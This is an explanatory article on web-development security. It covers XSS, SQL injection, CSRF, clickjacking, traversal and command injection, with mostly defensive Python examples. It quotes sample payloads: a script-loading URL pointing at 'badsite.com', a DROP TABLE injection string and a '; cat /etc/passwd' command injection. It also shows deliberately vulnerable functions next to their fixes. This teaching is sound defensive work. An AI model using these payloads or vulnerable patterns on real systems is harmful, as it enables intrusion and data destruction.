Today the Internet is often described as unsafe, to the point where the only truly safe computer system is one with no network connection. In recent times, for example during the ENDSARS protests, we often heard of organizations' websites becoming unavailable because of denial-of-service attacks, or displaying modified (and often misleading) content on their home pages. In other high-profile cases, millions of passwords, email addresses and credit card details have been leaked into the public domain, exposing website users to both personal embarrassment and financial risk.
The purpose of applying cybersecurity in web development is mainly to thwart these (and other) kinds of attack. Cybersecurity in web development can be defined as the set of practices that protect web applications, such as websites and enterprise resource planning (ERP) systems, from unauthorized access, use, modification, destruction or disruption.
Effective cybersecurity requires design effort across the whole of the web application: the configuration of the web server, the front end and back end, the policies for creating and renewing passwords, and the client-side code. While all that sounds daunting, the reassuring part is that a well-configured and up-to-date server-side web framework will provide, and often enable by default, robust and well-thought-out defences against many of the more common attacks. Other attacks can be mitigated through the web server configuration, for example by enabling HTTPS. Finally, publicly available vulnerability scanners can help you find out whether you have made any obvious mistakes.
2.1 What is Cybersecurity
Cybersecurity is the protection of internet- or intranet-connected systems, including hardware, software and data, from cyber threats (Kaspersky, 2018). The practice is used by individuals and enterprises to protect against unauthorized access to data centers and other computerized systems.
The goal of implementing cybersecurity is to provide good security measures for computers, servers, networks, mobile devices and the data stored on them against attackers with malicious intent. Cyber-attacks can be designed to access, delete or extort an organization's or user's sensitive data, which makes cybersecurity vital. Medical, government, corporate and financial organizations, for example, may all hold vital personal information about an individual.
Cybersecurity is a continuously changing field, as the development of new technologies opens up new avenues for cyberattacks. Additionally, even though significant security breaches are the ones that get publicized, small organizations still have to concern themselves with security breaches, as they are often the target of malware and phishing.
To protect organizations, employees and individuals, organizations and services should implement cybersecurity tools, training and risk management approaches, and continually update systems as technologies change and evolve (Techtarget, 2018).
2.2 Elements of cybersecurity
Ensuring cybersecurity requires the coordination of security efforts made throughout an information system, including:
- Application security
- Information security
- Network security
- Disaster recovery/business continuity planning
- Operational security
- End-user education
Keeping up with changing security risks is a challenge in cybersecurity. The traditional approach has been to focus resources on crucial system components and protect against the biggest known threats, which leaves other components undefended and systems unprotected against less dangerous risks.
To deal with the current environment, advisory organizations are promoting a more proactive and adaptive approach. The National Institute of Standards and Technology (NIST), for example, issued updated guidelines in its risk assessment framework that recommend a shift toward continuous monitoring and real-time assessments.
Version 1.1 of the Framework for Improving Critical Infrastructure Cybersecurity was released in April 2018. The voluntary cybersecurity framework, developed for use in the banking, communications, defense and energy industries, can be adopted by all sectors, including federal and state governments. President Donald Trump issued an executive order mandating that federal agencies adopt the NIST Cybersecurity Framework (NIST CSF) in May 2017 (The White House, 2017).
As a result of these risks, investment in cybersecurity technologies and services is increasing. Gartner predicted that worldwide spending on information security products and services would grow to $114 billion in 2018, and by a further 8.7% to $124 billion in 2019. In 2019, Gartner also predicted that spending on enterprise security and risk management in the Middle East and North Africa would grow 11% in 2020.
2.3 Benefits of cybersecurity
Benefits of utilizing cybersecurity include:
- Business protection against malware, ransomware, phishing and social engineering.
- Protection for data and networks.
- Prevention of unauthorized access.
- Improved recovery time after a breach.
- Protection for end-users.
- Improved confidence in the product for both developers and customers.
2.4 Cybersecurity Challenges
Cybersecurity is continually challenged by hackers, data loss, privacy concerns, risk management and changing cybersecurity strategies. Nothing currently indicates that cyber-attacks will decrease. Moreover, the more entry points there are for attacks, the more cybersecurity is needed to secure networks and devices.
One of the most problematic elements of cybersecurity is the continually evolving nature of security risks. As new technologies emerge, and technology is used in new or different ways, new avenues of attack are developed as well. Keeping up with these continual changes and advances in attacks, and updating practices to protect against them, can be challenging for organizations. This also includes ensuring that all the elements of cybersecurity are continually reviewed and updated to protect against potential vulnerabilities, which can be especially challenging for smaller organizations.
Additionally, organizations today can gather a great deal of data on the individuals who use their services. The more data that is collected, the more attractive a target it becomes for cybercriminals who want to steal personally identifiable information. For example, an organization that stores personally identifiable information in the cloud may be subject to a ransomware attack, and should do what it can to prevent a cloud breach.
Cybersecurity should also address end-user education, as an employee may accidentally bring malware into a workplace on their work computer, laptop or smartphone.
Another large challenge is the shortage of skilled staff. As the data generated by businesses grows in importance, so does the need for cybersecurity personnel to analyze, manage and respond to incidents. It is estimated that there are two million unfilled cybersecurity jobs worldwide, and Cybersecurity Ventures estimates that by 2021 there will be up to 3.5 million.
However, new advances in machine learning and artificial intelligence (AI) are starting to help with organizing and managing security data, although not yet to the extent needed.
2.5 Web Development
Web development is the work involved in developing a web site for the Internet (World Wide Web) or an intranet (a private network). It is also referred to as the coding or programming that enables website functionality, per the owner’s requirements. It mainly deals with the non-design aspect of building websites, which includes coding and writing markup.
Web development ranges from creating plain text pages to complex web-based applications, social network applications and electronic business applications. A more comprehensive list of tasks to which Web development commonly refers may include Web engineering, Web design, Web content development, client liaison, client-side/server-side scripting, Web server and network security configuration, and e-commerce development.
The web development hierarchy is as follows:
- Client-side coding.
- Server-side coding.
- Database technology.
Among web professionals, “Web development” usually refers to the main non-design aspects of building Web sites: writing markup and coding.
For larger organizations and businesses, Web development teams can consist of hundreds of people (Web developers) and follow standard methods like Agile methodologies while developing Web sites. Smaller organizations may only require a single permanent or contracting developer, or secondary assignment to related job positions such as a graphic designer or information systems technician. Web development may be a collaborative effort between departments rather than the domain of a designated department. There are three kinds of Web developer specialization: front-end developer, back-end developer, and full-stack developer. Front-end developers are responsible for behavior and visuals that run in the user browser, while back-end developers deal with the servers.
2.6 Web Development and Cybersecurity
Cybersecurity continues to be an evolving challenge for website designers and developers. Every day, hackers create new malware strains and perform sophisticated attacks that can devastate client websites. As a web designer or developer, it is imperative that you understand your role in the security of your clients’ websites. Many people assume that you are handling every aspect of the site, including its protection. Because of this, you must take action and understand how to provide that security.
Web design and development can be lucrative careers; however, they come with a great deal of risk and uncertainty. Customers rely on designers and developers not only to design a beautiful and functional website, but also to protect it. Unfortunately, this means that as a designer or developer you may be held responsible, fair or not, for damage caused by hackers on websites that you created.
When Alpine Bank was breached in 2015, the web developer was held liable for more than $150,000 in damages. According to court documents, the developer had not maintained the website, installed basic anti-malware software, applied critical software patches, or encrypted customer information.
In another case, Graphics Online, a web development and hosting company in Australia, was forced to liquidate its entire business. The company had incurred over $100,000 in costs to remediate damage from cyberattacks and to purchase software to further protect itself and its customers. Unfortunately, it was unable to recover these costs and had to refer its customers to other providers.
3.0 Application of Cybersecurity in Web Development
From the conceptual stage of a web development project, cybersecurity measures are integrated at every stage of development to forestall security flaws that could break the application, or leave a loophole that could be exploited, once the project is deployed to production. These measures aim to identify known vulnerabilities and poor coding practices, and to limit the damage that an as-yet-unknown (zero-day) attack can do.
3.1 Top Cybersecurity Risks Considered During Web Development
Improving the security of a web application is a non-negotiable part of web development, as attackers constantly find new ways to locate loopholes and breach systems. Maintaining cybersecurity is therefore important. The main cybersecurity methods applied during web development aim to curtail the following attacks.
3.1.1 Cross-Site Scripting Vulnerability (XSS)
XSS vulnerabilities allow an attacker to deliver malicious code to an unsuspecting user. According to OWASP, XSS attacks are a type of injection in which malicious scripts are injected into otherwise trusted websites. When users visit these websites or web applications, the malicious script runs in their browser and can access information the user shares with the site. This information can then be used to hijack user sessions or to deface the response the user receives from the web server.
XSS can also be described as a class of attack that allows the attacker to inject client-side scripts, through the website, into the browsers of other users. Because the injected code arrives from the site itself, the browser trusts it, so it can, for example, send the user's session cookie to the attacker. With that cookie the attacker can act as though they were the user and do anything the user can, such as view credit card details, read contact details or change passwords ("Website security", 2020).
XSS vulnerabilities are divided into two main types, reflected and persistent (also called stored), based on how the site returns the injected script to a browser. A third variant, DOM-based XSS, arises entirely in client-side code that writes untrusted data into the page.
- A reflected XSS vulnerability occurs when user content that is passed to the server is returned immediately and unmodified for display in the browser. Any scripts in the original user content will be run when the new page is loaded.
For example, consider a site search function where the search terms are encoded as URL parameters, and these terms are displayed along with the results. An attacker can construct a search link that contains a malicious script as a parameter (e.g., http://mysite.com?q=beer<script%20src="http://badsite.com/tricky.js"></script>) and email it to another user. If the target user clicks this "interesting link", the script will be executed when the search results are displayed. As discussed earlier, this gives the attacker all the information they need to enter the site as the target user, potentially making purchases as the user or sharing their contact information.
- A persistent XSS vulnerability occurs when the malicious script is stored on the website and then later redisplayed unmodified for other users to execute unwittingly.
For example, a discussion board that accepts comments that contain unmodified HTML could store a malicious script from an attacker. When the comments are displayed, the script is executed and can send to the attacker the information required to access the user’s account. This sort of attack is extremely popular and powerful, because the attacker might not even have any direct engagement with the victims.
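As an added illustration (not code from the original article), the following Python shows both forms described above: a reflected search page and a stored comment board, each rendered once without output encoding and once with html.escape. The attacker URL, the site names and the comment payload are constructed for the example; real frameworks' template engines apply the same escaping automatically.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link in the shape of the search example above.
REFLECTED_URL = (
    "http://mysite.com/?q=beer<script%20src="
    '"http://badsite.com/tricky.js"></script>'
)


def search_term_from_url(url: str) -> str:
    """Read the q= parameter exactly as a server-side search handler would."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_results_vulnerable(term: str) -> str:
    """Reflected XSS: the raw term is written straight into the HTML body."""
    return f"<h1>Results for: {term}</h1>"


def render_results_safe(term: str) -> str:
    """Same page with the term entity-encoded for the HTML body context.
    quote=True also encodes ' and ", which matters if the value ever lands
    inside an attribute."""
    return f"<h1>Results for: {html.escape(term, quote=True)}</h1>"


class CommentBoard:
    """Stored (persistent) XSS. Comments are kept exactly as submitted; whether
    the attack works depends on how the *output* is rendered."""

    def __init__(self):
        self._comments = []

    def post(self, author: str, body: str) -> None:
        self._comments.append((author, body))

    def render(self, escape_output: bool) -> str:
        if escape_output:
            enc = lambda s: html.escape(s, quote=True)
        else:
            enc = lambda s: s
        items = "".join(
            f"<li><b>{enc(author)}</b>: {enc(body)}</li>"
            for author, body in self._comments
        )
        return f"<ul>{items}</ul>"


def contains_live_script(page: str) -> bool:
    """Demo check: is there still an executable <script> tag in the markup
    (as opposed to the inert text '&lt;script')?"""
    return "<script" in page.lower()
```

Encoding on output, for the context the value lands in (HTML body, attribute, JavaScript string, URL), is the fix; stripping "bad" characters on input is not, because the same comment may be rendered in several contexts later.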
3.1.2 SQL Injection Vulnerability
SQL injection occurs when an attacker inserts, or "injects", crafted input into a website so that it becomes part of a database query, giving the attacker access to the entire website database (Ed Pollack, 2019). This includes reading sensitive data, modifying or deleting database records and, with some database configurations, reading or writing files on the server. For website owners, this can result in customer and visitor information being stolen and/or sold, or the website being shut down entirely.
These vulnerabilities lie in the website's code and can be fixed by developers who know where to look for them; however, finding them requires constant attention. Tools that automatically identify such vulnerabilities can dramatically shorten the time to fix the issue and reduce the damage.
SQL injection vulnerabilities enable malicious users to execute arbitrary SQL on the database, allowing data to be accessed, modified or deleted irrespective of the application user's permissions (the query runs with the privileges of the application's database account). A successful injection attack might spoof identities, create new identities with administration rights, access all data on the server, or destroy or modify the data to make it unusable.
Common SQL injection types include error-based SQL injection, boolean-based blind SQL injection and time-based blind SQL injection, as well as union-based injection and stacked queries (the technique used in the example below).
This vulnerability is present when user input passed into an SQL statement can change the meaning of the statement. For example, the following code is intended to list all users with a particular name (userName) supplied from an HTML form:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
If the user supplies a real name, the statement works as intended. However, a malicious user can completely change its behavior by supplying the following text as userName:
a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't
The server then executes this statement:
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
The modified statement is valid SQL that deletes the users table and selects all data from the userinfo table (which reveals the information of every user). This works because the first part of the injected text (a';) closes the string literal and completes the original statement, and the trailing 't' = 't lines up with the quote and semicolon that the original code appends.
To avoid this sort of attack, you must ensure that user data passed to an SQL query cannot change the nature of the query. The reliable way is to use parameterized queries (prepared statements), where the SQL text and the data values are sent to the database separately so that input is only ever treated as a value; most frameworks' database layers and ORMs do this by default. Escaping every character that has a special meaning in SQL is the older alternative, and it is easy to get wrong.
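As an added example (not from the original article), the following Python uses the standard-library sqlite3 module to run the concatenated query from above against an in-memory database, next to its parameterized counterpart. The users table and its two rows are constructed for the example. The vulnerable delete uses executescript() to mimic a driver that accepts stacked statements, since sqlite3's execute() refuses them; drivers for MySQL and SQL Server frequently do not.

```python
import sqlite3

# Constructed sample data; table and column names follow the example above.
SEED_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]

# Two payloads: a tautology that widens a SELECT, and a stacked statement
# that drops the table (the attack described above).
TAUTOLOGY = "a' OR 't' = 't"
STACKED = "a'; DROP TABLE users; --"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, user_name: str) -> list:
    """String concatenation: the input becomes part of the SQL text, so a
    quote in it ends the literal and the rest is parsed as SQL."""
    statement = "SELECT name, email FROM users WHERE name = '" + user_name + "';"
    return conn.execute(statement).fetchall()


def find_user_safe(conn: sqlite3.Connection, user_name: str) -> list:
    """Parameterized query: the driver binds the value separately, so it can
    never close the literal or add clauses, whatever it contains."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?;", (user_name,)
    ).fetchall()


def delete_user_vulnerable(conn: sqlite3.Connection, user_name: str) -> None:
    """Concatenation again. executescript() runs every statement in the string,
    which is what the DROP TABLE payload relies on."""
    conn.executescript("DELETE FROM users WHERE name = '" + user_name + "';")


def delete_user_safe(conn: sqlite3.Connection, user_name: str) -> None:
    conn.execute("DELETE FROM users WHERE name = ?;", (user_name,))
    conn.commit()


def users_table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row is not None
```

With the tautology payload the concatenated SELECT returns every user, while the parameterized version returns nothing because it is looking for a user literally named "a' OR 't' = 't". With the stacked payload the concatenated DELETE drops the table; the parameterized DELETE deletes nothing and the table survives.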
3.1.3 Cross-Site Request Forgery (CSRF)
CSRF attacks allow a malicious user to execute actions using the credentials of another user without that user’s knowledge or consent.
This type of attack is best explained by example. John is a malicious user who knows that a particular site allows logged-in users to send money to a specified account using an HTTP POST request that includes the account name and an amount of money. John constructs a form that includes his bank details and an amount of money as hidden fields, and emails it to other site users (with the Submit button disguised as a link to a “get rich quick” site).
If a user clicks the submit button, an HTTP POST request will be sent to the server containing the transaction details and any client-side cookies that the browser associated with the site (adding associated site cookies to requests is normal browser behavior). The server will check the cookies, and use them to determine whether or not the user is logged in and has permission to make the transaction.
The result is that any user who clicks the Submit button while they are logged in to the trading site will make the transaction. John gets rich.
One way to prevent this type of attack is for the server to require that POST requests include a user-specific, site-generated secret. The secret is supplied by the server when it sends the web form used to make transfers. This prevents John from creating his own form, because he would have to know the secret that the server is providing for each user. Even if he found out the secret for one user and built a form for that user, he could not use the same form to attack every user. Web frameworks such as Django include such CSRF prevention mechanisms; marking the session cookie SameSite=Lax or Strict adds a second layer of defence, since the browser then withholds it from cross-site form submissions.
3.1.4 Clickjacking
Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages (Robert McMillan, 2008). In this attack, a malicious user hijacks clicks meant for a visible top-level site and routes them to a hidden page beneath. The technique might be used, for example, to display a legitimate bank site but capture the login credentials in an invisible <iframe> controlled by the attacker. Clickjacking could also be used to get the user to click a button on a visible site and, in doing so, unwittingly click a completely different button. As a defense, your site can prevent itself from being embedded in an iframe on another site by setting the appropriate HTTP response headers: X-Frame-Options: DENY (or SAMEORIGIN) for older browsers, and the Content-Security-Policy frame-ancestors directive for current ones.
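The token scheme described above, as an added Python example that is not part of the original article: the server derives a per-session token with an HMAC over the session id, embeds it in its own form, and rejects any POST whose token does not match the session named by the cookie. SERVER_SECRET, the SessionStore and the request shapes are constructed for the example; Django's CsrfViewMiddleware does the same job with a masked token and additional Origin/Referer checks.

```python
import hashlib
import hmac
import secrets

# Assumed per-deployment key; in a real application it lives in configuration,
# never in source. Generated fresh here so the example runs stand-alone.
SERVER_SECRET = secrets.token_bytes(32)


class SessionStore:
    """Minimal stand-in for the server's session table (constructed)."""

    def __init__(self):
        self._users_by_session = {}

    def login(self, user: str) -> str:
        session_id = secrets.token_urlsafe(32)
        self._users_by_session[session_id] = user
        return session_id

    def user_for(self, session_id: str):
        return self._users_by_session.get(session_id)


def csrf_token_for(session_id: str) -> str:
    """The site-generated secret: an HMAC of the session id. Unguessable
    without SERVER_SECRET, and bound to one session, so a token John obtains
    for his own session is useless against another user."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_transfer_form(session_id: str) -> str:
    """The legitimate form: the server embeds the token as a hidden field."""
    token = csrf_token_for(session_id)
    return (
        '<form method="post" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input name="to_account"><input name="amount">'
        '<button type="submit">Send</button></form>'
    )


def handle_transfer(sessions: SessionStore, cookies: dict, form: dict) -> str:
    """Server-side POST handler. The cookie arrives automatically with any
    cross-site form submission, so it proves only that *some* logged-in browser
    sent the request; the token proves the form came from our own site."""
    session_id = cookies.get("session", "")
    user = sessions.user_for(session_id)
    if user is None:
        return "401 not logged in"
    expected = csrf_token_for(session_id)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so a wrong token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied, expected):
        return "403 CSRF token missing or invalid"
    return f"200 {user} sent {form['amount']} to {form['to_account']}"
```

John's form carries the victim's cookie but no valid token, so it fails; a token John copied from his own session fails too, because it is bound to his session id rather than the victim's.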
3.1.5 Denial of Service (DoS)
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users ("Palo Alto Networks", 2020). DoS is usually achieved by flooding a target site with bogus requests so that access to the site is disrupted for legitimate users. The requests may simply be numerous, or they may individually consume large amounts of resource (e.g., slow reads or uploads of large files). DoS defenses usually work by identifying and blocking "bad" traffic while allowing legitimate requests through. These defenses typically sit in front of, or inside, the web server (they are not part of the web application itself).
3.1.6 Directory Traversal (file and directory disclosure)
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application ("Web Security Academy", 2020). In this attack, a malicious user attempts to access parts of the web server file system that they should not be able to access. The vulnerability occurs when the user is able to pass file names that include file system navigation sequences (for example, ../../). The solution is to resolve the requested path and check that it still lies inside the intended directory before using it, rather than trying to strip dangerous characters from the input.
3.1.7 File Inclusion.
In this attack, a user is able to specify an "unintended" file for display or execution in data passed to the server. When loaded, this file might be executed on the web server or on the client side (leading to an XSS attack). The solution is not to let the request name the file at all: map a short key to a fixed allow-list of permitted files, and reject anything else.
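An added Python example (not from the original article) covering both the traversal check and the file-inclusion allow-list described above. PUBLIC_ROOT and the TEMPLATES table are constructed for the example; the directory does not need to exist for the path arithmetic to work, because pathlib normalises the path lexically when it is absent.

```python
from pathlib import Path
from urllib.parse import unquote

# Assumed document root (constructed for the example).
PUBLIC_ROOT = "/var/www/public"


def resolve_public_file(base_dir: str, requested: str) -> Path:
    """Map a user-supplied path onto base_dir and refuse anything that ends up
    outside it after normalisation. Raises ValueError on traversal attempts."""
    if "\x00" in requested:
        # A null byte truncates the name in C-level file APIs (index.html\0.png).
        raise ValueError("null byte in requested path")
    base = Path(base_dir).resolve()
    # Decode percent-encoding exactly once. A web server has usually done this
    # already; decoding twice would re-open the %252e%252e trick.
    candidate = (base / unquote(requested)).resolve()
    # An absolute 'requested' replaces base entirely in the join above, and
    # ../ sequences climb out of it; both are caught by this containment check.
    if candidate != base and base not in candidate.parents:
        raise ValueError(f"{requested!r} escapes {base}")
    return candidate


def is_allowed(requested: str, base_dir: str = PUBLIC_ROOT) -> bool:
    try:
        resolve_public_file(base_dir, requested)
        return True
    except ValueError:
        return False


# File inclusion: the request supplies a key, never a file name. Constructed
# allow-list of pages this site is willing to render.
TEMPLATES = {"home": "home.html", "about": "about.html", "contact": "contact.html"}


def template_for(page_key: str) -> Path:
    try:
        name = TEMPLATES[page_key]
    except KeyError:
        raise ValueError(f"unknown page {page_key!r}") from None
    return Path(PUBLIC_ROOT, "templates", name)
```

The containment check is done on the resolved path, so symbolic links inside the document root that point outside it are also rejected on a real file system.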
3.1.8 Command Injection.
Command injection attacks allow a malicious user to execute arbitrary system commands on the host operating system. They typically arise when user input is concatenated into a command string that is then handed to a shell, where characters such as ;, |, & and $( ) are interpreted. The solution is to avoid invoking a shell with user-controlled input at all: pass arguments to the program as a separate list, and validate the input against a strict allow-list of what it is supposed to look like.
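An added Python example (not from the original article) of the two approaches just described, using the familiar "ping a host" web form. The host-name pattern and the command are constructed for the example; run_ping is included to show the safe call shape and is not exercised here because it needs network access.

```python
import re
import subprocess

# RFC 1123 host-name shape: labels of letters, digits and hyphens joined by
# dots, 253 characters at most. Dotted-quad IPv4 addresses match as well.
# Anything else, including every shell metacharacter, is rejected outright.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_command_vulnerable(host: str) -> str:
    """What a naive network-tools page does: build a single string for the
    shell (os.system or subprocess with shell=True). With
    host = 'example.com; cat /etc/passwd' the shell runs both commands."""
    return "ping -c 1 " + host


def is_valid_host(host: str) -> bool:
    return HOSTNAME_RE.match(host) is not None


def ping_argv_safe(host: str) -> list:
    """Validate against the allow-list pattern, then place the value in its own
    argv element so no shell ever parses it. Note the pattern also forbids a
    leading '-', which blocks option injection such as '-f'."""
    if not is_valid_host(host):
        raise ValueError(f"invalid host name {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Run the validated command without a shell (shell=False is the default
    for a list argument) and with a timeout so a slow target cannot tie up a
    worker; returns the process exit code."""
    result = subprocess.run(ping_argv_safe(host), capture_output=True, timeout=10)
    return result.returncode
```

Quoting the value (for example with shlex.quote) and still going through a shell is a weaker second choice: it protects against metacharacters but not against an argument that the program itself interprets as an option.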
3.2 Key Cybersecurity Measures to Curtail Attacks
A number of other concrete steps you can take are:
- Use more effective password management. Encourage strong, unique passwords and store only salted, slow hashes of them. Note that current NIST guidance (SP 800-63B) advises against forcing users to change passwords on a fixed schedule; change them when there is evidence of compromise. Consider two-factor authentication for your site, so that in addition to a password the user must enter another authentication code, usually one generated by or delivered to something only the user possesses. An authenticator app or hardware security key is preferable to a code sent by SMS, which can be intercepted through SIM swapping.
- Configure your web server to use HTTPS and HTTP Strict Transport Security (HSTS). HTTPS encrypts data sent between client and server, so that login credentials, cookies, POST data and header information are not readable by anyone on the network path; HSTS tells browsers to refuse plain HTTP for your site in future, which closes the window for downgrade attacks.
- Keep track of the most common threats (the OWASP Top 10 list is the usual starting point) and address the most common vulnerabilities first.
- Use vulnerability scanning tools to perform automated security testing on your site. Later on, once your website is successful, you may also find bugs by offering a bug bounty, as Mozilla does.
- Only store and display data that you need. For example, if your users must store sensitive information like credit card details, only display enough of the card number that it can be identified by the user, and not enough that it can be copied by an attacker and used on another site. The most common pattern at this time is to only display the last 4 digits of a credit card number.
Web frameworks such as Django, Laravel, and those built on Node.js (for example Express) can help mitigate many of the more common vulnerabilities.
Attackers target web applications to steal sensitive online data, blackmail people, steal money, create chaos in society and ruin a company's reputation. Cybercrime can cause huge damage to a company, from its finances to its products and its customers. It is therefore imperative that web developers consider cybersecurity at every stage of web development and deployment; ignoring it can throw hours of labour into the bin and cause severe financial or reputational loss.
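The HTTPS/HSTS item above and the clickjacking defence in 3.1.4 both come down to response headers. As an added example (not from the original article or any framework's source), here is a small WSGI middleware in Python that redirects plain HTTP to HTTPS and adds the headers to every HTTPS response; the header values, the hello_app placeholder and the in-process client are constructed for the example. Django exposes the same behaviour through settings such as SECURE_SSL_REDIRECT, SECURE_HSTS_SECONDS and X_FRAME_OPTIONS.

```python
# Headers a server-side framework or reverse proxy should add to every HTTPS
# response. Values are conservative defaults chosen for this example.
SECURITY_HEADERS = {
    # Browsers use HTTPS only for this host and its subdomains for a year.
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    # Clickjacking: refuse to be framed. frame-ancestors is the modern form;
    # X-Frame-Options is kept for older browsers.
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}


def secure_headers_middleware(app):
    """WSGI middleware: redirect http:// to https:// and add SECURITY_HEADERS
    to HTTPS responses. A header the application sets itself is left alone."""

    def wrapped(environ, start_response):
        if environ.get("wsgi.url_scheme") != "https":
            host = environ.get("HTTP_HOST", "localhost")
            location = f"https://{host}{environ.get('PATH_INFO', '/')}"
            if environ.get("QUERY_STRING"):
                location += "?" + environ["QUERY_STRING"]
            # HSTS is deliberately not sent here: browsers ignore it over
            # plain HTTP, and the redirect gets the client onto HTTPS first.
            start_response(
                "301 Moved Permanently",
                [("Location", location), ("Content-Length", "0")],
            )
            return [b""]

        def start_with_headers(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            extra = [
                (name, value)
                for name, value in SECURITY_HEADERS.items()
                if name.lower() not in present
            ]
            return start_response(status, list(headers) + extra, exc_info)

        return app(environ, start_with_headers)

    return wrapped


def hello_app(environ, start_response):
    """Constructed placeholder application."""
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [b"<h1>hello</h1>"]


def call(app, environ):
    """Tiny in-process WSGI client: returns (status, headers dict, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


app = secure_headers_middleware(hello_app)
```

Before adding preload to the HSTS value or submitting the domain to the browser preload list, make sure every subdomain really serves HTTPS: the policy cannot be withdrawn quickly once browsers have cached it.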
Written by Peace Onwuka
Kaspersky.com (2020). What is Cyber Security? Retrieved 6 December 2020, from https://www.kaspersky.com/resource-center/definitions/what-is-cyber-security
Mozilla.org (2020). Website security – MDN Web Docs. Retrieved 6 December 2020, from https://developer.mozilla.org/en-US/docs/Learn/Server-side/First_steps/Website_security
Palo Alto Networks (2020). What is a denial of service attack (DoS)? Retrieved 6 December 2020, from https://www.paloaltonetworks.com/cyberpedia/what-is-a-denial-of-service-attack-dos
Portswigger.net (2020). What is directory traversal, and how to prevent it? Web Security Academy. Retrieved 6 December 2020, from https://portswigger.net/web-security/file-path-traversal
Pollack, E. (2020). SQL Injection: What is it? Causes and exploits. SQL Shack. Retrieved 6 December 2020, from https://www.sqlshack.com/sql-injection-what-is-it-causes-and-exploits/
McMillan, R. (17 September 2008). At Adobe's request, hackers nix 'clickjacking' talk. PC World. Retrieved 8 October 2008, from https://www.pcworld.idg.com.au/article/260609/adobe_request_hackers_nix_clickjacking_talk/
Search Security (2020). What is Cybersecurity? Everything You Need to Know. TechTarget. Retrieved 6 December 2020, from https://searchsecurity.techtarget.com/definition/cybersecurity
Techopedia.com (2020). What is Web Development? Definition from Techopedia. Retrieved 6 December 2020, from https://www.techopedia.com/definition/23889/web-development
The White House (2017). Presidential Executive Order on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure. Retrieved 6 December 2020, from https://www.whitehouse.gov/presidential-actions/presidential-executive-order-strengthening-cybersecurity-federal-networks-critical-infrastructure/